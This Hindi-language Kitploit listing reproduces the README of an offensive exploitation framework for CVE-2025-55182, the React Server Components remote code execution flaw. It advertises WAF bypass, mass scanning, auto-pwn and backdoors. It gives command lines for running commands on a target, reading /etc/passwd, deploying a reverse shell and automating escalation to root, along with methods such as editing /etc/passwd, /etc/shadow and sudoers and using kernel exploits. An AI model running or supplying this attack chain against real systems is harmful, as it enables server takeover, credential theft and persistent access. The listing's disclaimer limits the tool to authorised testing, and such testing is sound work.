Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Cerberus-React2Shell-Scanner-Exploit — CVE-2025-55182 (React Server Components RCE) के लिए Elite exploitation टूलकिट। Async polymorphic payloads, उन्नत WAF/CDN बाईपास, proxy rotation, Shodan/Censys mass scan, auto-pwn + reverse shells, Nuclei templates, K8s lab और C2 dashboard। Sudeepa Wanigarathna द्वारा लिखित – केवल अधिकृत red team और penetration testing के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिभेद्यता स्कैनरशोषण फ्रेमवर्कशेलकोडवेब एप्लिकेशन शोषणपोस्ट-शोषणकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रेड टीमिंग
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

रिपॉजिटरी देखें
211 महीना पहलेअभी तक समीक्षित नहीं

विवरण

CVE-2025-55182 (React Server Components RCE) के लिए Elite exploitation टूलकिट। Async polymorphic payloads, उन्नत WAF/CDN बाईपास, proxy rotation, Shodan/Censys mass scan, auto-pwn + reverse shells, Nuclei templates, K8s lab और C2 dashboard। Sudeepa Wanigarathna द्वारा लिखित – केवल अधिकृत red team और penetration testing के लिए।

साझा करें

Cerberus React2Shell - शस्त्रीकृत शोषण ढांचा

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 अवलोकन

Next.js सर्वर एक्शन्स RCE भेद्यता (React2Shell) के लिए पेशेवर-ग्रेड शोषण ढांचा। प्रारंभिक पहुंच से रूट विशेषाधिकार वृद्धि तक पूर्ण आक्रमण श्रृंखला प्रदर्शित करता है।

क्षमताएँ:

  • ✅ स्वचालित भेद्यता पहचान
  • ✅ रिमोट कोड निष्पादन (RCE)
  • ✅ इंटरैक्टिव शेल पहुंच
  • ✅ लिनक्स सिस्टम गणना
  • ✅ स्वचालित विशेषाधिकार वृद्धि
  • ✅ रिवर्स शेल तैनाती
  • ✅ फ़ाइल अपलोड/डाउनलोड
  • ✅ रूट पहुंच प्रदर्शन

🚀 त्वरित आरंभ

मूल RCE

root@kitploit:~
# Check vulnerability
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Execute command
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

इंटरैक्टिव शेल

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

पूर्ण स्वचालित आक्रमण श्रृंखला

root@kitploit:~
# Complete exploitation: RCE → Enumeration → Root Access
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 ढांचा संरचना

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # मुख्य शोषण इंजन (400+ पंक्तियाँ)
├── demo_exploit.py              # स्वचालित आक्रमण श्रृंखला (290+ पंक्तियाँ)
├── interactive_shell.py         # इंटरैक्टिव शेल (280+ पंक्तियाँ)
├── reverse_shell_handler.py     # रिवर्स शेल श्रोता (180+ पंक्तियाँ)
├── post_exploit/
│   ├── linux_enum.py           # सिस्टम गणना (330+ पंक्तियाँ)
│   ├── priv_esc.py             # विशेषाधिकार वृद्धि (320+ पंक्तियाँ)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # पूर्ण उपयोग दस्तावेज़ीकरण
├── QUICKSTART.md                # त्वरित संदर्भ
└── BANNER.txt

🔥 सुविधाएँ

मुख्य शोषण इंजन

  • एक्शन आईडी खोज: JavaScript बंडलों से स्वचालित निष्कर्षण
  • एकाधिक पेलोड: execSync, spawn, eval, mainModule वेरिएंट्स
  • आउटपुट निष्कर्षण: त्रुटि प्रतिक्रियाओं से कमांड आउटपुट पार्स करें
  • WAF बाईपास: पेलोड अस्पष्टीकरण तकनीकें

पोस्ट-शोषण

  • लिनक्स गणना: SUID/SGID बायनेरिज़, लिखने योग्य पथ, क्रॉन जॉब्स, कर्नेल संस्करण
  • विशेषाधिकार वृद्धि: GTFOBins, लिखने योग्य /etc फ़ाइलें, डॉकर एस्केप, क्षमताएँ
  • फ़ाइल संचालन: base64 एन्कोडिंग के साथ अपलोड/डाउनलोड
  • स्थिरता: एकाधिक बैकडोर विधियाँ

इंटरैक्टिव उपकरण

  • इंटरैक्टिव शेल: अंतर्निहित कमांड के साथ रीयल-टाइम कमांड निष्पादन
  • रिवर्स शेल: एकाधिक शेल प्रकार (bash, python, nc, perl)
  • डेमो मोड: 6-चरणीय स्वचालित प्रदर्शन

📖 उपयोग उदाहरण

1. बुनियादी कमांड

root@kitploit:~
# Vulnerability check
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Execute commands
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Different payload variants
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# With obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. इंटरैक्टिव शेल

root@kitploit:~
# Launch shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# Available commands:
# - execute <cmd>        : Execute shell command
# - enum                 : Run full enumeration
# - escalate             : Attempt privilege escalation
# - upload <local> <remote>  : Upload file
# - download <remote> <local>: Download file
# - shell <lhost> <lport>: Deploy reverse shell
# - info                 : Show session info
# - exit                 : Quit

3. रिवर्स शेल

root@kitploit:~
# Terminal 1: Start listener
python3 reverse_shell_handler.py --lport 4444

# Terminal 2: Deploy shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. स्वचालित डेमो

root@kitploit:~
# Full chain: Discovery → RCE → Enum → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 आक्रमण श्रृंखला

ढांचा एक पूर्ण 6-चरणीय शोषण श्रृंखला लागू करता है:

  1. खोज - JavaScript बंडलों से सर्वर एक्शन आईडी निकालें
  2. शोषण - कार्यशील एक्शन आईडी खोजें और RCE प्राप्त करें
  3. सत्यापन - id कमांड से कोड निष्पादन की पुष्टि करें
  4. गणना - सिस्टम जानकारी, SUID बायनेरिज़, लिखने योग्य पथ एकत्र करें
  5. वृद्धि - विशेषाधिकार वृद्धि वेक्टरों का स्वचालित रूप से शोषण करें
  6. प्रदर्शन - /etc/shadow पढ़कर और /root सूचीबद्ध करके रूट पहुंच साबित करें

🛡️ विशेषाधिकार वृद्धि तकनीकें

कार्यान्वित विधियाँ

  1. SUID बायनेरिज़ (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. लिखने योग्य /etc फ़ाइलें

    • /etc/passwd - नया रूट उपयोगकर्ता जोड़ें
    • /etc/shadow - रूट पासवर्ड साफ़ करें
    • /etc/sudoers - NOPASSWD sudo प्रदान करें
  3. डॉकर एस्केप

    • सुलभ डॉकर सॉकेट शोषण
    • विशेषाधिकार प्राप्त कंटेनर से बाहर निकलना
  4. कर्नेल शोषण

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. लिनक्स क्षमताएँ

    • CAP_SETUID, CAP_DAC_OVERRIDE शोषण

📊 सांख्यिकी

  • कोड की कुल पंक्तियाँ: 1,800+
  • मॉड्यूल: 8
  • विशेषाधिकार वृद्धि तकनीकें: 5
  • पेलोड वेरिएंट: 4
  • शेल प्रकार: 4 (bash, python, nc, perl)

⚙️ आवश्यकताएँ

root@kitploit:~
pip install -r requirements.txt

निर्भरताएँ:

  • requests
  • colorama

📚 दस्तावेज़ीकरण

  • EXPLOITATION_GUIDE.md - उदाहरणों के साथ पूर्ण उपयोग गाइड
  • QUICKSTART.md - सामान्य कमांड के लिए त्वरित संदर्भ

⚠️ अस्वीकरण

चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। अपने जोखिम पर उपयोग करें।

🎓 शैक्षिक उद्देश्य

यह ढांचा इसके लिए डिज़ाइन किया गया है:

  • Next.js भेद्यताओं का अध्ययन करने वाले सुरक्षा शोधकर्ता
  • अधिकृत पैठ परीक्षक
  • सुरक्षा प्रशिक्षण और CTF चुनौतियाँ
  • नियंत्रित प्रयोगशाला वातावरण में भेद्यता अनुसंधान

📄 लाइसेंस

MIT लाइसेंस (केवल शैक्षिक उद्देश्यों के लिए)

👤 लेखक

Sudeepa Wanigarathna

  • शोषण विकास में विशेषज्ञ
  • सुरक्षा शोधकर्ता
  • पैठ परीक्षक

संस्करण: 1.0
अंतिम अद्यतन: दिसंबर 2025
प्रयोगशाला स्थिति: http://127.0.0.1:3000 (चालू)

विस्तृत उपयोग निर्देशों के लिए, EXPLOITATION_GUIDE.md देखें।

टूल डाउनलोड करें